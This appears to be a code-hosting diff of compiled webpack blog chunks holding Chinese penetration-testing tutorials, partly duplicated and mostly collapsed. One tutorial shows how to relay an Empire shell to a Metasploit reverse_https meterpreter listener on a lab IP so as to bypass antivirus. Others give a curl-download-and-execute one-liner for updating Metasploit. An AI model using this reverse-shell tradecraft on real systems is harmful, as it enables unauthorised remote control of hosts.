(window.webpackJsonp=window.webpackJsonp||[]).push([[264],{554:function(s,t,a){"use strict";a.r(t);var e=a(7),l=Object(e.a)({},(function(){var s=this,t=s._self._c;return t("ContentSlotsDistributor",{attrs:{"slot-key":s.$parent.slotKey}},[t("h1",{attrs:{id:"empire-反弹回-metasploit"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#empire-反弹回-metasploit"}},[s._v("#")]),s._v(" Empire 反弹回 Metasploit")]),s._v(" "),t("p",[s._v("在实际渗透中,当拿到WebShell上传的MSF客户端无法绕过目标主机的杀毒软件时,可以使用PowerShell来绕过,也可以执行Empire的Payload来绕过,成功之后再使用Empiore的模块将其反弹回Metasploit。 这里使用Empire的usemodule code_execution/invoke_shellcode模块修改两个参数:Lhost、Lport。将Lhost修改为MSF所在主机的IP,按以下命令设置:")]),s._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[s._v("set Lhost 192.168.31.247\nset Lport 4444\n")])]),s._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[s._v("1")]),t("br"),t("span",{staticClass:"line-number"},[s._v("2")]),t("br")])]),t("p",[t("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/2019010920450179.jpg",loading:"lazy"}})]),s._v(" "),t("p",[s._v("在MSF上设置监听,命令如下:")]),s._v(" "),t("div",{staticClass:"language- line-numbers-mode"},[t("pre",{pre:!0,attrs:{class:"language-text"}},[t("code",[s._v("use exploit/multi/handler\nset payload windows/meterpreter/reverse_https\nset lhost 192.168.31.247\nset lport 4444\nrun\n")])]),s._v(" "),t("div",{staticClass:"line-numbers-wrapper"},[t("span",{staticClass:"line-number"},[s._v("1")]),t("br"),t("span",{staticClass:"line-number"},[s._v("2")]),t("br"),t("span",{staticClass:"line-number"},[s._v("3")]),t("br"),t("span",{staticClass:"line-number"},[s._v("4")]),t("br"),t("span",{staticClass:"line-number"},[s._v("5")]),t("br")])]),t("p",[s._v("运行后,就可以收到Empire反弹回来的Shell")]),s._v(" "),t("p",[t("img",{staticClass:"lazy",attrs:{alt:"img","data-src":"https://img-blog.csdnimg.cn/20190109204848442.jpg",loading:"lazy"}})]),s._v(" "),t("h1",{attrs:{id:"写在最后"}},[t("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[s._v("#")]),s._v(" 写在最后")]),s._v(" "),t("blockquote",[t("p",[s._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),t("strong",[s._v("冰河技术")]),s._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),t("strong",[s._v("冰河技术")]),s._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),t("strong",[s._v("冰河技术")]),s._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),t("strong",[s._v("冰河技术")]),s._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),s._v(" "),t("p",[t("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);t.default=l.exports}}]);
\ No newline at end of file
此差异已折叠。
此差异已折叠。
此差异已折叠。
(window.webpackJsonp=window.webpackJsonp||[]).push([[270],{562:function(t,s,a){"use strict";a.r(s);var e=a(7),l=Object(e.a)({},(function(){var t=this,s=t._self._c;return s("ContentSlotsDistributor",{attrs:{"slot-key":t.$parent.slotKey}},[s("h1",{attrs:{id:"kali中一键更新metasploit框架"}},[s("a",{staticClass:"header-anchor",attrs:{href:"#kali中一键更新metasploit框架"}},[t._v("#")]),t._v(" Kali中一键更新Metasploit框架")]),t._v(" "),s("p",[t._v("最近,我升级了Kali系统,升级后,尼玛Metasploit各种蛋疼的事情就发生了,我通过Metasploit整合OpenVAS,最后执行导入数据库的时候,尼玛就报出了如下错误:")]),t._v(" "),s("div",{staticClass:"language- line-numbers-mode"},[s("pre",{pre:!0,attrs:{class:"language-text"}},[s("code",[t._v("opts must include a valid :workspace\n")])]),t._v(" "),s("div",{staticClass:"line-numbers-wrapper"},[s("span",{staticClass:"line-number"},[t._v("1")]),s("br")])]),s("p",[t._v("于是我感觉在msfconsole下,执行banner命令查看版本,我去,竟然是:metasploit v5.0.1-dev-")]),t._v(" "),s("p",[t._v("咋就变成了开发版本了呢?蛋疼,怎么会升级为开发版本???!!!,Kali??!!无语中。。。")]),t._v(" "),s("p",[t._v("那么,如何解决这个问题,我想到了升级Metasploit,于是一顿操作猛如虎,解决了这个问题,下面就如何一键升级Metasploit跟大家分享下:")]),t._v(" "),s("p",[t._v("其实很简单,这里我将各种操作整理成了一个脚本:update_metasploit.sh,内容如下:")]),t._v(" "),s("div",{staticClass:"language- line-numbers-mode"},[s("pre",{pre:!0,attrs:{class:"language-text"}},[s("code",[t._v("curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \\\nchmod 755 msfinstall && \\\n./msfinstall\n")])]),t._v(" "),s("div",{staticClass:"line-numbers-wrapper"},[s("span",{staticClass:"line-number"},[t._v("1")]),s("br"),s("span",{staticClass:"line-number"},[t._v("2")]),s("br"),s("span",{staticClass:"line-number"},[t._v("3")]),s("br")])]),s("p",[t._v("将脚本上传到Kali赋予相应的权限,执行脚本,OK,问题解决!!!")]),t._v(" "),s("h2",{attrs:{id:"写在最后"}},[s("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[t._v("#")]),t._v(" 写在最后")]),t._v(" "),s("blockquote",[s("p",[t._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),t._v(" "),s("p",[s("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);s.default=l.exports}}]);
\ No newline at end of file
(window.webpackJsonp=window.webpackJsonp||[]).push([[270],{560:function(t,s,a){"use strict";a.r(s);var e=a(7),l=Object(e.a)({},(function(){var t=this,s=t._self._c;return s("ContentSlotsDistributor",{attrs:{"slot-key":t.$parent.slotKey}},[s("h1",{attrs:{id:"kali中一键更新metasploit框架"}},[s("a",{staticClass:"header-anchor",attrs:{href:"#kali中一键更新metasploit框架"}},[t._v("#")]),t._v(" Kali中一键更新Metasploit框架")]),t._v(" "),s("p",[t._v("最近,我升级了Kali系统,升级后,尼玛Metasploit各种蛋疼的事情就发生了,我通过Metasploit整合OpenVAS,最后执行导入数据库的时候,尼玛就报出了如下错误:")]),t._v(" "),s("div",{staticClass:"language- line-numbers-mode"},[s("pre",{pre:!0,attrs:{class:"language-text"}},[s("code",[t._v("opts must include a valid :workspace\n")])]),t._v(" "),s("div",{staticClass:"line-numbers-wrapper"},[s("span",{staticClass:"line-number"},[t._v("1")]),s("br")])]),s("p",[t._v("于是我感觉在msfconsole下,执行banner命令查看版本,我去,竟然是:metasploit v5.0.1-dev-")]),t._v(" "),s("p",[t._v("咋就变成了开发版本了呢?蛋疼,怎么会升级为开发版本???!!!,Kali??!!无语中。。。")]),t._v(" "),s("p",[t._v("那么,如何解决这个问题,我想到了升级Metasploit,于是一顿操作猛如虎,解决了这个问题,下面就如何一键升级Metasploit跟大家分享下:")]),t._v(" "),s("p",[t._v("其实很简单,这里我将各种操作整理成了一个脚本:update_metasploit.sh,内容如下:")]),t._v(" "),s("div",{staticClass:"language- line-numbers-mode"},[s("pre",{pre:!0,attrs:{class:"language-text"}},[s("code",[t._v("curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \\\nchmod 755 msfinstall && \\\n./msfinstall\n")])]),t._v(" "),s("div",{staticClass:"line-numbers-wrapper"},[s("span",{staticClass:"line-number"},[t._v("1")]),s("br"),s("span",{staticClass:"line-number"},[t._v("2")]),s("br"),s("span",{staticClass:"line-number"},[t._v("3")]),s("br")])]),s("p",[t._v("将脚本上传到Kali赋予相应的权限,执行脚本,OK,问题解决!!!")]),t._v(" "),s("h2",{attrs:{id:"写在最后"}},[s("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[t._v("#")]),t._v(" 写在最后")]),t._v(" "),s("blockquote",[s("p",[t._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),t._v(" "),s("p",[s("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);s.default=l.exports}}]);
\ No newline at end of file
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
(window.webpackJsonp=window.webpackJsonp||[]).push([[279],{570:function(t,s,a){"use strict";a.r(s);var e=a(7),r=Object(e.a)({},(function(){var t=this,s=t._self._c;return s("ContentSlotsDistributor",{attrs:{"slot-key":t.$parent.slotKey}},[s("h1",{attrs:{id:"kali一句话升级metasploit的命令"}},[s("a",{staticClass:"header-anchor",attrs:{href:"#kali一句话升级metasploit的命令"}},[t._v("#")]),t._v(" Kali一句话升级Metasploit的命令")]),t._v(" "),s("div",{staticClass:"language- line-numbers-mode"},[s("pre",{pre:!0,attrs:{class:"language-text"}},[s("code",[t._v("curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \\chmod 755 msfinstall && \\./msfinstall\n")])]),t._v(" "),s("div",{staticClass:"line-numbers-wrapper"},[s("span",{staticClass:"line-number"},[t._v("1")]),s("br")])]),s("h2",{attrs:{id:"写在最后"}},[s("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[t._v("#")]),t._v(" 写在最后")]),t._v(" "),s("blockquote",[s("p",[t._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),t._v(" "),s("p",[s("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);s.default=r.exports}}]);
\ No newline at end of file
(window.webpackJsonp=window.webpackJsonp||[]).push([[279],{569:function(t,s,a){"use strict";a.r(s);var e=a(7),r=Object(e.a)({},(function(){var t=this,s=t._self._c;return s("ContentSlotsDistributor",{attrs:{"slot-key":t.$parent.slotKey}},[s("h1",{attrs:{id:"kali一句话升级metasploit的命令"}},[s("a",{staticClass:"header-anchor",attrs:{href:"#kali一句话升级metasploit的命令"}},[t._v("#")]),t._v(" Kali一句话升级Metasploit的命令")]),t._v(" "),s("div",{staticClass:"language- line-numbers-mode"},[s("pre",{pre:!0,attrs:{class:"language-text"}},[s("code",[t._v("curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \\chmod 755 msfinstall && \\./msfinstall\n")])]),t._v(" "),s("div",{staticClass:"line-numbers-wrapper"},[s("span",{staticClass:"line-number"},[t._v("1")]),s("br")])]),s("h2",{attrs:{id:"写在最后"}},[s("a",{staticClass:"header-anchor",attrs:{href:"#写在最后"}},[t._v("#")]),t._v(" 写在最后")]),t._v(" "),s("blockquote",[s("p",[t._v("如果你觉得冰河写的还不错,请微信搜索并关注「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 "),s("strong",[t._v("冰河技术")]),t._v(" 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!")])]),t._v(" "),s("p",[s("img",{staticClass:"lazy",attrs:{alt:"","data-src":"https://img-blog.csdnimg.cn/20200906013715889.png",loading:"lazy"}})])])}),[],!1,null,null,null);s.default=r.exports}}]);
\ No newline at end of file
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
(window.webpackJsonp=window.webpackJsonp||[]).push([[305],{596:function(t,n,s){"use strict";s.r(n);var e=s(7),o=Object(e.a)({},(function(){return(0,this._self._c)("ContentSlotsDistributor",{attrs:{"slot-key":this.$parent.slotKey}})}),[],!1,null,null,null);n.default=o.exports}}]);
\ No newline at end of file
(window.webpackJsonp=window.webpackJsonp||[]).push([[305],{595:function(t,n,s){"use strict";s.r(n);var e=s(7),o=Object(e.a)({},(function(){return(0,this._self._c)("ContentSlotsDistributor",{attrs:{"slot-key":this.$parent.slotKey}})}),[],!1,null,null,null);n.default=o.exports}}]);
\ No newline at end of file
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
此差异已折叠。
Markdown is supported
0% .
You are about to add 0 people to the discussion. Proceed with caution.
先完成此消息的编辑!
想要评论请 注册